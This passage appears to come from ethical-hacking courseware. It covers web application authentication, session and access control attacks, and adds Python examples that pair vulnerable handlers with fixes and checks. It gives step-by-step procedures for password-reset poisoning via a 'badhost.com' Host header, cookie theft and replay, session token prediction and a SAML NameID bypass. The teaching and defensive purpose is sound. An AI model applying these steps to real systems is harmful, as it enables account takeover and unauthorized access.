Note: Username enumeration from verbose error messages will fail if the application has an account lockout policy, whereby the account is automatically locked after a certain number of failed login attempts.

Some applications automatically generate account usernames based on a sequence (e.g., "user101," "user102"). Therefore, attackers can perform username enumeration by determining the appropriate sequence.
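The leak described above, side by side with the uniform-message handler and lockout policy the note mentions, as an added example (not code from the CEH courseware or from wordpress.com). The account, password and lockout threshold are constructed; the enumeration_oracle helper is the check a reviewer would run against a login endpoint.

```python
# Added example, not from the CEH courseware: a login handler whose error
# messages reveal whether the username exists (the behaviour shown in the
# WordPress example) beside one that returns a uniform message and locks the
# account after repeated failures. Account, password and threshold are
# constructed for illustration.
ACCOUNTS = {"rinimatthews": "constructed-password"}
LOCKOUT_THRESHOLD = 5
_failed_attempts = {}   # username -> consecutive failures (in-memory stand-in)


def login_verbose(username, password):
    """Leaky: the message differs depending on which field was wrong."""
    if username not in ACCOUNTS:
        return "invalid email or username"
    if ACCOUNTS[username] != password:
        return "the password you entered for the username is incorrect"
    return "ok"


def login_uniform(username, password):
    """Uniform: the same message for an unknown user and for a wrong password,
    and the account locks after LOCKOUT_THRESHOLD consecutive failures."""
    if _failed_attempts.get(username, 0) >= LOCKOUT_THRESHOLD:
        return "account locked"
    if ACCOUNTS.get(username) != password:
        _failed_attempts[username] = _failed_attempts.get(username, 0) + 1
        return "invalid username or password"
    _failed_attempts.pop(username, None)   # success resets the counter
    return "ok"


def enumeration_oracle(handler, existing, missing, password="wrong-guess"):
    """Reviewer's check: does the handler answer differently for an account
    that exists and one that does not? True means usernames can be enumerated."""
    return handler(existing, password) != handler(missing, password)


def lockout_after_failures(username="rinimatthews"):
    """Message the correct password receives once the lockout has triggered."""
    _failed_attempts.pop(username, None)
    for _ in range(LOCKOUT_THRESHOLD):
        login_uniform(username, "constructed-wrong")
    return login_uniform(username, ACCOUNTS[username])
```

Response text is only one channel: a reviewer would run the same oracle against status codes and response timing, since a handler that skips the password hash for unknown users answers measurably faster.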
Password Attacks: Password Functionality Exploits

Password Changing: Determine the password change functionality within the application by spidering the application or creating a login account. Try random strings for the "Old Password", "New Password", and "Confirm the New Password" fields and analyze errors to identify vulnerabilities in the password change functionality.

Password Recovery: "Forgot Password" features generally present a challenge to the user; if the number of attempts is not limited, an attacker can guess the answer and solve the challenge successfully with the help of social engineering. Applications may also send a unique recovery URL or existing password to an email address specified by the attacker if the challenge is solved.

"Remember Me" Exploit: "Remember Me" functions are implemented using a simple persistent cookie such as RememberUser=jason or a persistent session identifier such as RememberUser=ABY112010. Attackers can use an enumerated username or predict the session identifier to bypass authentication mechanisms.
Password Attacks: Password Guessing

As its name implies, password guessing is the process of guessing possible user keywords that might constitute an account password until eventually arriving at the correct one. To guess passwords, attackers use techniques such as password lists and password dictionaries.

Password List: The majority of keywords used for preparing the password list include certain daily usage words such as birth date, street name, nickname, anniversary date, phone number, PIN number, or a parent's, friend's, or pet's name. Create a list of possible passwords using the most commonly used passwords as well as footprinting and social engineering techniques, and try each password until the correct password is discovered.

Password Dictionary: A password dictionary is the compilation of word and number combinations that could be passwords. This type of attack saves time compared to a brute force attack. Create a dictionary of all possible passwords using tools such as Dictionary Maker to perform dictionary attacks.

Tools: Password guessing can be performed manually or using automated tools such as THC-Hydra, Burp Suite, and Dictionary Maker.

THC-Hydra

Source: https://www.thc.org

THC-Hydra is a network logon cracker that supports many different services, such as IPv6 and Internationalized RFC 4013. It comes with a GUI and supports HTTP proxy and SOCKS proxy. Furthermore, it uses various authentication methods for services, including Firebird, FTP, IMAP, LDAP, MS-SQL, RDP, SMTP, SNMP, and Telnet.

Figure 14.64: Screenshot of THC-Hydra

Brute-forcing is another method used for cracking passwords. Guessing becomes crucial when the password is long or contains letters in upper and lower cases. If numbers and symbols are used, it could take several years to guess the password, which is impractical. Try to crack the password by trying all possible values from a set of alphabetical, numerical, and special characters. Use password cracking tools such as Burp Suite to crack the password.

Password Cracking Tools

Some brute-forcing tools for cracking passwords are described below.

Burp Suite

Source: https://portswigger.net

Burp Suite is an integrated platform for performing security testing of web applications. It has various tools that work together to support the entire testing process, from initial mapping and analysis of an application's attack surface to finding and exploiting security vulnerabilities.

Burp Suite built-in tools:

Intercepting proxy for inspecting and modifying traffic between your browser and the target application
Application-aware spider for crawling content and functionality
Web application scanner for automating the detection of numerous types of vulnerabilities
Intruder tool for performing customized attacks to find and exploit unusual vulnerabilities
Repeater tool for manipulating and resending individual requests
Sequencer tool for testing the randomness of session tokens

Figure 14.65: Screenshot of Burp Suite

Some additional password cracking tools are as follows:

L0phtCrack (https://www.l0phtcrack.com)
ophcrack (http://ophcrack.sourceforge.net)
RainbowCrack (http://project-rainbowcrack.com)
Windows Password Recovery Tool (https://www.windowspasswordsrecovery.com)
Dictionary Maker (http://dictionarymaker.sourceforge.net)
Password Attacks: Attack Password Reset Mechanism

Insecure password management practices lead to critical security vulnerabilities. One such vulnerability is password reset poisoning, which is exploited by the attacker to leverage headers such as Host in the HTTP request message.

Resetting the password is a common function used by the user when he/she forgets his/her password and needs to reset it. The user receives a forgot password link via email containing the one-time token, and when the link is clicked, the server responds with a password reset page.

For example, consider the following HTTP request where the attacker uses the Host header to perform the attack:

    GET https://certifiedhacker.com/reset.php?email=foo@bar.com HTTP/1.1
    Host: badhost.com

The following password reset link is sent to the victim:

    $resetPwdURL = "https://{$_SERVER['HTTP_HOST']}/reset-pwd.php?token=87654321-8765-8765-8765-10987654321"

The abovementioned URL link is injected in a password reset email and sent to the victim. As the developers expect $_SERVER['HTTP_HOST'] to be from certifiedhacker.com, they fail to perform additional input sanity checks.

The password reset poisoning attack involves the following steps:

Step 1: The attacker obtains the target's email address used on the website through techniques such as social engineering and OSINT.

Step 2: The attacker sends a password reset request link to the victim using the altered Host header. For example,

    POST https://certifiedhacker.com/reset.php HTTP/1.1
    Accept: */*
    Content-Type: application/json
    Host: badhost.com

The resultant URL for resetting the password is,

    https://badhost.com/reset-password.php?token=87654321-8765-8765-8765-10987654321
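The link construction from the Host header, beside the version that takes the host from server-side configuration, as an added example (not code from the CEH courseware). The request dicts stand in for a web framework's request object; the canonical host, reset path and token value are those of the page's example, and the is_poisoned helper is the outgoing-mail check a defender would add.

```python
# Added example, not from the CEH courseware: building the password-reset link
# from the request's Host header, as the $_SERVER['HTTP_HOST'] code above does,
# beside a version that takes the host from server-side configuration. The
# request dicts stand in for a web framework's request object; the canonical
# host, path and token value are taken from the page's example.
from urllib.parse import urlencode, urlsplit

CANONICAL_HOST = "certifiedhacker.com"
RESET_PATH = "/reset-pwd.php"
TOKEN = "87654321-8765-8765-8765-10987654321"


def reset_url_from_host_header(request, token=TOKEN):
    """Vulnerable: whatever Host header the client sent ends up in the link,
    so Host: badhost.com produces a link pointing at the attacker's host."""
    host = request["headers"]["Host"]
    return f"https://{host}{RESET_PATH}?{urlencode({'token': token})}"


def reset_url_from_config(request, token=TOKEN):
    """Fixed: the link is built from the configured host, and a request whose
    Host header does not match the configured host is rejected outright."""
    host = request["headers"].get("Host", "")
    if host.lower() != CANONICAL_HOST:
        raise ValueError(f"unexpected Host header: {host!r}")
    return f"https://{CANONICAL_HOST}{RESET_PATH}?{urlencode({'token': token})}"


def is_poisoned(url):
    """Detection hook for outgoing mail: a reset link must point at our host."""
    return urlsplit(url).hostname != CANONICAL_HOST


# Constructed requests: the first carries the altered Host header from Step 2.
POISONED_REQUEST = {
    "method": "POST", "path": "/reset.php",
    "headers": {"Host": "badhost.com", "Accept": "*/*",
                "Content-Type": "application/json"},
}
NORMAL_REQUEST = {
    "method": "POST", "path": "/reset.php",
    "headers": {"Host": "certifiedhacker.com", "Accept": "*/*"},
}


def demo():
    """Returns (poisoned link from the vulnerable code, whether the fixed code
    rejected the poisoned request, link from the fixed code for a normal request)."""
    poisoned = reset_url_from_host_header(POISONED_REQUEST)
    try:
        reset_url_from_config(POISONED_REQUEST)
        rejected = False
    except ValueError:
        rejected = True
    return poisoned, rejected, reset_url_from_config(NORMAL_REQUEST)
```

Rejecting unexpected Host values at the framework level (Django's ALLOWED_HOSTS setting is one such mechanism) closes the whole class of Host-derived link problems, not only the reset flow; the is_poisoned check remains useful as a last line of defence before mail leaves the server.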
Step 3: Now, the attacker waits for the victim to receive the modified email.

Step 4: Once the victim clicks on the malicious link embedded in the email, the attacker extracts the password reset token. Using this token, the attacker performs various malicious activities such as cloning web applications to steal the user's credentials or acting as a proxy and mimicking the behavior and contents of the original website.

Session Attacks: Session ID Prediction/Brute-forcing

Every time a user logs in to a particular website, the server assigns a session ID to the user to keep track of all the activities on the website. This session ID is valid until the user logs out; the server provides a new session ID when the user logs in again. Attackers try to exploit this session ID mechanism by guessing the next session ID after collecting some valid ones. For certain web applications, the session ID information involves a string of fixed width. Randomness is essential to avoid prediction.

Session attacks are performed in the following steps:

In the first step, collect some valid session ID values by sniffing traffic from authenticated users.

Analyze the captured session IDs to determine the session ID generation process, such as the structure of the session ID, the information that is used to create it, and the encryption or hash algorithm used by the application to protect it.

Vulnerable session generation mechanisms that use session IDs composed of a username or other predictable information, such as a timestamp or client IP address, can be exploited by easily guessing valid session IDs.

In addition, you can implement a brute-force technique to generate and test different values of the session ID until you successfully gain access to the application.

From the diagram below, you can see that the session ID variable is indicated by JSESSIONID and its assumed value is "user01," which corresponds to the username. By guessing its new value, say, as "user02," it is possible for the attacker to gain unauthorized access to the application.
Figure 14.66: Screenshot displaying predictable session cookie
Cookie Exploitation: Cookie Poisoning

Cookies frequently transmit sensitive credentials from the client browser to the server. Attackers can modify these with ease to gain access to the server or assume the identity of another user.

Client browsers use cookies to maintain a session state when they employ the stateless HTTP protocol for communication. Servers tie unique session IDs to the individual accessing the web application. Poisoning of cookies and session information can allow an attacker to inject malicious content or modify the user's online experience and obtain unauthorized information.

Cookies can contain session-specific data such as user IDs, passwords, account numbers, links to shopping cart contents, supplied private information, and session IDs. They exist as files stored in the client computer's memory or on its hard disk. By modifying the cookie data, an attacker can often gain escalated access or maliciously affect the user's session. Many sites offer the "Remember me?" function and store the user information in a cookie so that the user does not have to re-enter the data with every visit to the site. Any private information entered is stored in a cookie. To protect cookies, site developers often encode them. Encoded cookies give developers a false sense of cookie security, as the encoding process can easily be reversed with decoding methods such as Base64 and ROT13 (rotating the letters of the alphabet through 13 characters).
Cookie poisoning is performed in the following steps:

If the cookie contains passwords or session identifiers, steal the cookie using techniques such as script injection and eavesdropping.

Then, replay the cookie with the same or altered passwords or session identifiers to bypass web application authentication.

Trap cookies using tools such as OWASP Zed Attack Proxy and Burp Suite.
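Why encoding gives the false sense of security described above, and what a server-side integrity check changes, as an added example (not code from the CEH courseware). The cookie contents, the tampering and the server secret are constructed for illustration; the sign/verify pair uses HMAC-SHA256 from the standard library.

```python
# Added example, not from the CEH courseware: a Base64 "protected" cookie that
# anyone can decode, alter and re-encode, beside an HMAC-signed cookie whose
# tampering is detected server-side. Secret, cookie values and the altered
# field are constructed for illustration.
import base64
import hashlib
import hmac
import json

SERVER_SECRET = b"constructed-demo-secret-do-not-hardcode-in-real-code"


def encode_cookie(data):
    """The 'encoding for protection' the text describes: Base64 of the JSON."""
    return base64.b64encode(json.dumps(data).encode()).decode()


def decode_cookie(cookie):
    return json.loads(base64.b64decode(cookie))


def poison_encoded_cookie(cookie, **changes):
    """Shows the reversibility: decode, change a field, re-encode."""
    data = decode_cookie(cookie)
    data.update(changes)
    return encode_cookie(data)


def sign_cookie(data, secret=SERVER_SECRET):
    """Defence: append an HMAC-SHA256 tag computed over the encoded payload.
    Without the secret, a client cannot produce a valid tag for altered data."""
    payload = encode_cookie(data)
    tag = hmac.new(secret, payload.encode(), hashlib.sha256).hexdigest()
    return f"{payload}.{tag}"


def verify_signed_cookie(cookie, secret=SERVER_SECRET):
    """Returns the cookie data only when the tag verifies; None otherwise.
    compare_digest keeps the comparison constant-time."""
    try:
        payload, tag = cookie.rsplit(".", 1)
    except ValueError:
        return None
    expected = hmac.new(secret, payload.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, expected):
        return None
    return decode_cookie(payload)


def demo():
    original = {"user": "jason", "role": "user"}
    weak = encode_cookie(original)
    weak_poisoned = poison_encoded_cookie(weak, role="admin")
    signed = sign_cookie(original)
    payload, tag = signed.rsplit(".", 1)
    # Same field change applied to the signed cookie, keeping the old tag.
    signed_poisoned = poison_encoded_cookie(payload, role="admin") + "." + tag
    return {
        "weak_accepted_role": decode_cookie(weak_poisoned)["role"],
        "signed_original": verify_signed_cookie(signed),
        "signed_poisoned": verify_signed_cookie(signed_poisoned),
    }
```

A signature stops modification but not replay: the cookie still needs an expiry inside the signed payload and, for session cookies, the Secure and HttpOnly attributes so that the script-injection and eavesdropping theft routes in the steps above are harder to use. Keeping only an opaque random session identifier in the cookie, with the role held server-side, avoids the problem altogether.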
Cookie Exploitation Tools:

OWASP Zed Attack Proxy

Source: https://www.owasp.org

OWASP Zed Attack Proxy Project (ZAP) is an integrated penetration testing tool for web applications. It provides automated scanners as well as a set of tools that allow you to find security vulnerabilities manually.

Figure 14.67: Screenshot of OWASP ZAP

Some additional cookie exploitation tools are as follows:

L0phtCrack (https://www.l0phtcrack.com)
Burp Suite (https://www.portswigger.net)
XSSer (https://xsser.03c8.net)
Bypass Authentication: Bypass SAML-based SSO

The single sign-on (SSO) authentication process permits a user to sign in to an application using a single set of credentials, and the same login session can be used to access multiple applications irrespective of the domain or platform. For instance, when a user logs in using his/her Google account on a desktop or mobile device, he/she is automatically authenticated for other services such as Google Drive, YouTube, and Gmail. This authentication mechanism inside different applications is performed using the SAML protocol.

Security Assertion Markup Language (SAML) is an XML-based infrastructure that serves as an authorization and authentication medium between two peers, such as an identity provider (IdP) and a service provider (SP). The service provider entrusts the identity provider with validating users. Then, the identity provider responds with a SAML assertion (confirmation message) after validating any user.

Figure 14.68: Illustration of SAML-based SSO

Traditional applications can perform the authentication process before providing protected function access to the user. With the evolution of the SSO infrastructure, this authentication process has been handed over to third-party identity provider applications to access functions from the service provider application. Communication between these applications can be established through SAML messages. These SAML messages are encoded using Base64 encoding. Attackers can easily decode these messages and read their content. Two major fields in SAML messages, signature and assertion, are susceptible to midway tampering. Signature is used to build a trust relationship between the SP and the IdP, and assertion is used to direct the SP on providing application services to the valid users.

Attackers can take advantage of signature misconfigurations, session expiry timeouts, session replays, misdirected SAML messages, etc., to bypass SAML-based SSO authentication and insert their own messages. Attackers use tools such as SAML Raider to bypass SAML-based SSO authentication. SAML Raider is a Burp Suite extension used for SAML infrastructure testing. It can be used to perform two core operations: modifying SAML messages and managing X.509 certificates.
Using SAML Raider

Configure the browser to proceed with Burp Suite. Open Burp Suite with the new project and navigate to the "Proxy" tab to ensure that the proxy is activated.

In Burp Suite, first, go to the "Extender" tab and then go to "BApp store", click and install the "SAML Raider" extension.

Access Burp Suite and ensure that the "Proxy" tab displays "Intercept is on". It enables Burp to find and tamper with requests directed to the servers. When the user's browser is pointed to the target (admin@xyz.org) website's secured registration page, Burp Suite indicates that the user is passed to the IdP system. SAML Raider displays a tab with the same name when there is SAML data that is to be decrypted. Users may need to pass a few more requests before they notice the "SAML Raider" tab with a request. Clicking on the "Forward" button can take the user to the IdP login page.

Soon after the user enters the credentials for admin@xyz.org.fakedomain.com, Burp once again impedes some web requests. Until it shows the "SAML Raider" tab, keep clicking the "Forward" tab to pass them without modifications. Consequently, SAML responses from the IdP system can also be impeded.

Going through the response can allow a user to find "NameID". It is located below the key and signature tabs.

Now, add your own comment between the two domain names and pass the response.

Figure 14.70: Screenshot of Burp Suite manipulating SAML response

In this case, as the signature is matching the manipulated response with valid messages, the SP approves and processes the first text parameter, admin@xyz.org, in NameID. Attackers use this technique to bypass the SAML-based SSO process and tamper with the responses.
Attack Authorization Schemes

A web application contains an authorization mechanism that restricts access to a specific resource or functionality (e.g., the Admin page) to authenticated users. The web application always performs user authorization following authentication. An attacker identifies a flawed authorization mechanism in the web application and takes advantage of it to access restricted pages by escalating privileges. The attacker tries to gain access to information without proper credentials. Thus, the attacker uses various techniques to attack the authorization schemes of the web application.

Authorization Attack

In an authorization attack, the attacker first finds a legitimate account with limited privileges, then logs in as that user, and gradually escalates privileges to access protected resources. He/she then manipulates the HTTP requests to subvert the application authorization schemes by modifying input fields related to the user ID, username, access group, cost, file names, file identifiers, etc. Attackers use sources such as uniform resource identifiers, parameter tampering, POST data, HTTP headers, query strings, cookies, and hidden tags to perform authorization attacks.

Uniform Resource Identifier: A uniform resource identifier (URI) provides a means to identify a resource. It is a global identifier for Internet resources accessed remotely or locally. An attacker may use URIs to access documents/directories that are protected from publishing, inject SQL queries or other unused commands into an application, and/or make a user view a certain site that is connected to another server.

Parameter Tampering: Parameter tampering involves the manipulation of parameters exchanged between the server and the client to modify the application data, such as the price and quantity of products, permissions, and user credentials. This information is usually stored in cookies, hidden form fields, or URL query strings, and attackers can use them to increase application functionality and control.

POST Data: POST data often comprises authorization and session information, as the information provided by the client must be associated with the session that provided it. The attacker can exploit vulnerabilities in the POST data and easily manipulate it.

HTTP Headers: Web browsers do not allow header modification. Therefore, to modify the header, the attacker has to write his/her own program and perform the HTTP request. He/she may also use available tools to modify any data sent from the browser. In general, an authorization HTTP header contains a username and password encoded in Base64. The attacker can compromise the header by submitting two HTTP requests bound in the same header. The proxy system executes the first HTTP header and the target system executes the other HTTP header, allowing the attacker to bypass the proxy's access control.

Query String and Cookies: Browsers use cookies to maintain their state in the stateless HTTP protocol as well as to store user preferences, session tokens, and other data. Clients can modify the cookies and send them to the server with URL requests, thereby allowing the attacker to modify the cookie content. Cookie modification depends on the cookie usage, which ranges from session tokens to authorized decision-making arrays.

Hidden Tags: When a user selects anything on an HTML page, the selection is stored as a form field value and sent to the application as an HTTP request (GET or POST). HTML can also store field values as hidden fields, which the browser does not render to the screen; instead, it collects and submits these fields as parameters during form submissions, which the user can manipulate. However, he/she has to make a choice. Code sent to browsers does not have any security value; therefore, by manipulating the hidden values, the attacker can easily access the page and run it in the browser.

Authorization Attack: HTTP Request Tampering

HTTP headers control information passed from web clients to web servers on HTTP requests and from web servers to web clients on HTTP responses. Each header consists of a single text line with a name and a value. There are two main ways to send data with HTTP: via the URL or the form. Tampering with HTTP data refers to modifying data of the HTTP request (or response) before the recipient reads it. The attacker changes the HTTP request without using another user's ID.

Query String Tampering: If the query string is visible in the address bar in the browser, then try to change the string parameter to bypass authorization mechanisms. You can use web spidering tools such as Burp Suite to scan the web application for POST parameters.

Figure 14.71: Screenshot displaying Query String Tampering

HTTP Headers: If the application uses the Referer header for making access control decisions, then try to modify it to access protected application functionalities. In the example below, ItemID 201 is not accessible as the Admin parameter is set to false; you can change it to true and access protected items.

Authorization Attack: Cookie Parameter Tampering

Cookie parameter tampering is a method used to tamper with the cookies set by the web application to perform malicious attacks. When the user logs into the site, the web application sets the session cookie and stores it in the browser.

Cookie parameter tampering is performed in the following steps:

1. In the first step, collect some session cookies set by the web application and analyze them to determine the cookie generation mechanism.

2. In the second step, trap the session cookie set by the web application, tamper its parameters using tools such as Burp Suite, and replay it to the application to gain unauthorized access to others' profiles.

The tool intercepts every request sent from the browser and allows you to edit the cookie to replace it with the tampered cookie parameters. If the cookie is not secure, you may be able to guess the parameters.

Burp Suite

Source: https://portswigger.net

Burp Suite is an integrated platform for performing security testing of web applications. It has various tools that work together to support the entire testing process, from initial mapping and analysis of an application's attack surface to finding and exploiting security vulnerabilities.

Figure 14.73: Screenshot of Burp Suite
Attack Access Controls

Access controls are part of the application's security mechanisms that are logically based on authentication and session management. An attacker walks through a website to identify the following access control details of the application:

Individual access to a particular subset of data
Levels of access granted (employees, managers, supervisors, CEOs, etc.)
Administrator functionality to configure and monitor
Functionalities that allow escalating privileges

Exploiting Insecure Access Controls

Parameter-Based Access Control: Any web application consists of various request parameters such as cookies and query string parameters. The application determines the access granted to a request based on these parameters. These parameters vary between a normal user and an administrator. Sometimes, these parameters are invisible to normal users and visible only to administrators. If an attacker can identify the parameters that are assigned to an administrator, he/she can set those parameters in their own requests and gain access to administrative functions.

Referer-Based Access Control: In some web applications, the HTTP referer is the foundation for major access control decisions. The HTTP referer is considered unsafe; the attacker can use it and manipulate it to any value.

Location-Based Access Control: The user's geographic location can be determined using various methods. The most common method to determine the current location is through the IP address. Attackers can bypass location-based access controls using a web proxy, a VPN, a data-roaming-enabled mobile device, or direct manipulation of client-side mechanisms.
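An endpoint that decides access from a client-supplied Admin parameter and the Referer header, beside one that resolves the role from the server-side session, as an added example (not code from the CEH courseware). It illustrates both the Parameter-Based and Referer-Based Access Control passages above and the earlier HTTP Headers example where ItemID 201 is hidden only by an Admin=false parameter. The item table, the session store and the request dicts are constructed; the item ID 201 is the page's.

```python
# Added example, not from the CEH courseware: authorization decided from data
# the client controls (request parameter and Referer header) beside
# authorization resolved from the server-side session. Items, sessions and
# requests are constructed; ItemID 201 is the protected item from the text.
ITEMS = {100: {"name": "public item", "protected": False},
         201: {"name": "protected item", "protected": True}}
SESSIONS = {"sess-user": {"user": "john", "role": "user"},
            "sess-admin": {"user": "root", "role": "admin"}}


def get_item_trusting_client(request):
    """Broken: the decision rests on an Admin parameter and a Referer value
    that the client can set to anything."""
    item = ITEMS[int(request["params"]["ItemID"])]
    if item["protected"]:
        is_admin = request["params"].get("Admin", "false") == "true"
        from_admin_ui = request["headers"].get("Referer", "").startswith(
            "https://certifiedhacker.com/admin/")
        if not (is_admin or from_admin_ui):
            return 403, None
    return 200, item["name"]


def get_item_server_side(request):
    """Fixed: the role comes from the server-side session record; parameters
    and headers play no part in the decision."""
    session = SESSIONS.get(request["cookies"].get("session"))
    if session is None:
        return 401, None
    item = ITEMS[int(request["params"]["ItemID"])]
    if item["protected"] and session["role"] != "admin":
        return 403, None
    return 200, item["name"]


def tampered_request():
    """A low-privilege session sending Admin=true and a forged Referer."""
    return {"params": {"ItemID": "201", "Admin": "true"},
            "headers": {"Referer": "https://certifiedhacker.com/admin/"},
            "cookies": {"session": "sess-user"}}


def demo():
    """Status codes the two handlers give the tampered request."""
    return (get_item_trusting_client(tampered_request())[0],
            get_item_server_side(tampered_request())[0])
```

The test a reviewer runs against a real endpoint is the same as demo(): replay a low-privilege user's request with the administrator-only parameters and headers added, and treat a 200 as a broken access control finding. Logging such mismatches (a user session requesting admin-only items) also gives a cheap detection signal.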
Access Controls Attack Methods

Attack with different user accounts: Attempt to access the application with different user accounts. If there is any broken access control in the web application, it allows you to access the resources and functionality as a legitimate user. You can use tools such as Burp Suite to access and compare two different user contexts.

Attack Multistage Processes: The abovementioned technique will be ineffective if there is a multistage process established in the web application architecture. In this multistage process, the user will perform multiple entries at multiple levels to complete the intended process. In a multistage process, multiple requests will be sent to the server from the client. To attack such a process, each and every request to the server should be captured and tested for access controls. Another way to attack a multistage process manually is to walk through a protected multistage process several times in your browser and use proxy tools to switch the session token supplied in different requests to that of a less privileged user.

Attack Static Resources: Identify the web applications where the protected static resources are accessed by the URLs. Attempt to request these URLs directly and check whether they are providing access to unauthorized users.

Attack Direct Access to Methods: Web applications accept certain requests that provide direct access to server-side APIs. If there are any access control weaknesses in these direct access methods, an attacker can exploit them and compromise the system.

Attack Restrictions on HTTP Methods: It is important to test different HTTP methods such as GET, POST, PUT, DELETE, TRACE, and OPTIONS. The attacker modifies the HTTP methods to compromise web applications. If the web application accepts these modified requests, the access controls can be bypassed.
Attack Session Management Mechanism

Web application session management involves exchanging sensitive information between the server and its clients wherever required. If such session management is insecure, the attacker can take advantage of it to attack the web application through the session management mechanism, which is the key security component in most web applications. Nowadays, most attackers target application session management to launch malicious attacks against web applications, allowing them to easily bypass robust authentication controls and masquerade as other users without even knowing their credentials (usernames, passwords). Attackers can even take control of the entire application by compromising a system administrator's account.

Session Management Attack

A session management attack is a method used by attackers to compromise a web application. Attackers break an application's session management mechanism to bypass the authentication controls and impersonate privileged application users. It involves two stages: session token generation and exploitation of session token handling. To generate a valid session token, attackers engage in the following:

Session Token Prediction: Attackers can do this when they realize that the server uses a deterministic pattern between session IDs. By successfully gaining the previous and next session IDs of the user, the attacker can perform malicious attacks pretending to be the user.

Session Token Tampering: Once the attackers gain the previous and next session ID, they can tamper with the session data and engage in further malicious activities.
Once attackers generate a valid session token, they try to exploit session token handling as follows:

- Man-in-the-Middle (MITM) Attack: Attackers intercept communication between two systems on a network. They divide the network connection into two: one between the client and the attacker, and the other between the attacker and the server. The attacker then acts as a proxy in the intercepted connection.

- Session Hijacking: Attackers steal the user session ID from a trusted website to perform malicious activities.

- Session Replay: Attackers obtain the user session ID and then reuse it to gain access to the user account.
Attacking Session Token Generation Mechanism

To determine the session token generation mechanism in a session management attack, attackers steal valid session tokens and then predict the next session token.

Through session prediction, attackers identify a pattern in the session token exchanged between the client and the server. This can happen when the web application has weak, predictable session identifiers. For example, when the web application assigns session tokens sequentially, attackers can predict the previous and next session tokens by knowing any session ID. Before predicting a session identifier, attackers have to obtain sufficient valid session tokens for legitimate system users.
- Weak Encoding Example

When an ASCII string such as user=jason;app=admin;date=08/01/2020 is merely hex encoded, you can predict another session token by just changing the date and use it for another transaction with the server:

    https://www.certifiedhacker.com/checkout?SessionToken=%75%73%65%72%3D%6A%61%73%6F%6E%3B%61%70%70%3D%61%64%6D%69%6E%3B%64%61%74%65%3D%30%38%2F%30%31%2F%32%30%32%30
- Session Token Prediction

  - Obtain valid session tokens by sniffing the traffic or legitimately logging into the application, and analyze them for any encoding pattern (hex encoding or Base64)

  - If any meaning can be reverse engineered from the sample of session tokens, then attempt to guess the tokens recently issued to other application users

  - Make a large number of requests with predicted tokens to a session-dependent page to determine a valid session token
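The decoding and pattern analysis described in the prediction steps above is exactly what a defender should run against their own application's tokens before an attacker does. The following is an added example, not code from the courseware: it tries the encodings the text names (percent-encoded hex, raw hex, Base64), extracts any key=value structure, and reports which fields vary across a sample. The sample tokens are constructed to mirror the page's user/app/date example; the STRONG_TOKENS constants and generate_token() are assumptions illustrating what a random token looks like.

```python
import base64
import binascii
import secrets
from urllib.parse import unquote_to_bytes

HEX_DIGITS = set("0123456789abcdefABCDEF")

# Constructed sample (not captured from any real site): three tokens that
# mirror the courseware's hex-encoded "user=jason;app=admin;date=..." example.
# Only the date field differs between them.
WEAK_TOKENS = [
    "%75%73%65%72%3D%6A%61%73%6F%6E%3B%61%70%70%3D%61%64%6D%69%6E%3B"
    "%64%61%74%65%3D%30%38%2F%30%31%2F%32%30%32%30",  # date=08/01/2020
    "%75%73%65%72%3D%6A%61%73%6F%6E%3B%61%70%70%3D%61%64%6D%69%6E%3B"
    "%64%61%74%65%3D%30%38%2F%30%32%2F%32%30%32%30",  # date=08/02/2020
    "%75%73%65%72%3D%6A%61%73%6F%6E%3B%61%70%70%3D%61%64%6D%69%6E%3B"
    "%64%61%74%65%3D%30%38%2F%30%33%2F%32%30%32%30",  # date=08/03/2020
]

# Constructed tokens of the kind secrets.token_hex(24) produces: random bytes,
# so decoding them yields no printable text and no fields.
STRONG_TOKENS = [
    "c41f9e2b7d0a83e5f6b1c9d2e4a7f08b3c5d6e7f90a1b2c3",
    "9a3b5c7d1e2f4a6b8c0d2e4f6a8b0c1d3e5f7a9b1c3d5e7f",
]


def _as_text(raw: bytes):
    """Return raw as str only if it is non-empty printable ASCII."""
    if raw and all(0x20 <= b < 0x7F for b in raw):
        return raw.decode("ascii")
    return None


def decode_token(token: str):
    """Try the encodings the courseware names (percent/hex, raw hex, Base64)
    and return the first decoding that is printable ASCII, else None."""
    if "%" in token:
        return _as_text(unquote_to_bytes(token))
    if len(token) % 2 == 0 and set(token) <= HEX_DIGITS:
        # Looks like plain hex. A hex string is also valid Base64 text, so
        # treat it as hex and do not fall through to the Base64 attempt.
        return _as_text(bytes.fromhex(token))
    try:
        padded = token + "=" * (-len(token) % 4)
        return _as_text(base64.b64decode(padded, validate=True))
    except (binascii.Error, ValueError):
        return None


def token_fields(text: str) -> dict:
    """Split 'key=value;key=value' into a dict; unstructured text gives {}."""
    fields = {}
    for part in text.split(";"):
        key, sep, value = part.partition("=")
        if sep and key.strip():
            fields[key.strip()] = value.strip()
    return fields


def audit_tokens(tokens):
    """Summarize what a sample of tokens reveals: how many decode to text,
    which fields they carry, and which fields vary across the sample."""
    values, decodable = {}, 0
    for token in tokens:
        text = decode_token(token)
        if text is None:
            continue
        decodable += 1
        for key, value in token_fields(text).items():
            values.setdefault(key, set()).add(value)
    varying = sorted(k for k, v in values.items() if len(v) > 1)
    return {
        "decodable": decodable,
        "fields": sorted(values),
        "varying": varying,
        # Structured content with at most one changing field means a forger
        # only has to edit that field (here the date), as the text describes.
        "predictable": bool(values) and len(varying) <= 1,
    }


def generate_token() -> str:
    """Server-side replacement: 192 random bits from the OS CSPRNG, hex-encoded.
    Nothing in it decodes to a meaning an attacker could edit."""
    return secrets.token_hex(24)


if __name__ == "__main__":
    print(decode_token(WEAK_TOKENS[0]))
    print(audit_tokens(WEAK_TOKENS))
    print(audit_tokens(STRONG_TOKENS))
    print(audit_tokens([generate_token() for _ in range(5)]))
```

Run against a handful of tokens captured from your own application; a non-empty "fields" list or a True "predictable" flag means the token carries recoverable structure and should be replaced by a random identifier that is only a lookup key into server-side session state.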

Attacking Session Tokens Handling Mechanism: Session Token Sniffing

First, sniff network traffic for valid session tokens and then use them to predict the next session token. Use the predicted session ID to authenticate with the target web application. The steps for session token sniffing are as follows:

- Sniff the application traffic using a sniffing tool such as Wireshark or an intercepting proxy such as Burp Suite

- If HTTP cookies are being used as the transmission mechanism for session tokens and the secure flag is not set, then try to replay the cookie to gain unauthorized access to the application

- Use session cookies to perform session hijacking, session replay, and MITM attacks

Thus, the valid session token is important in session management sniffing attacks.
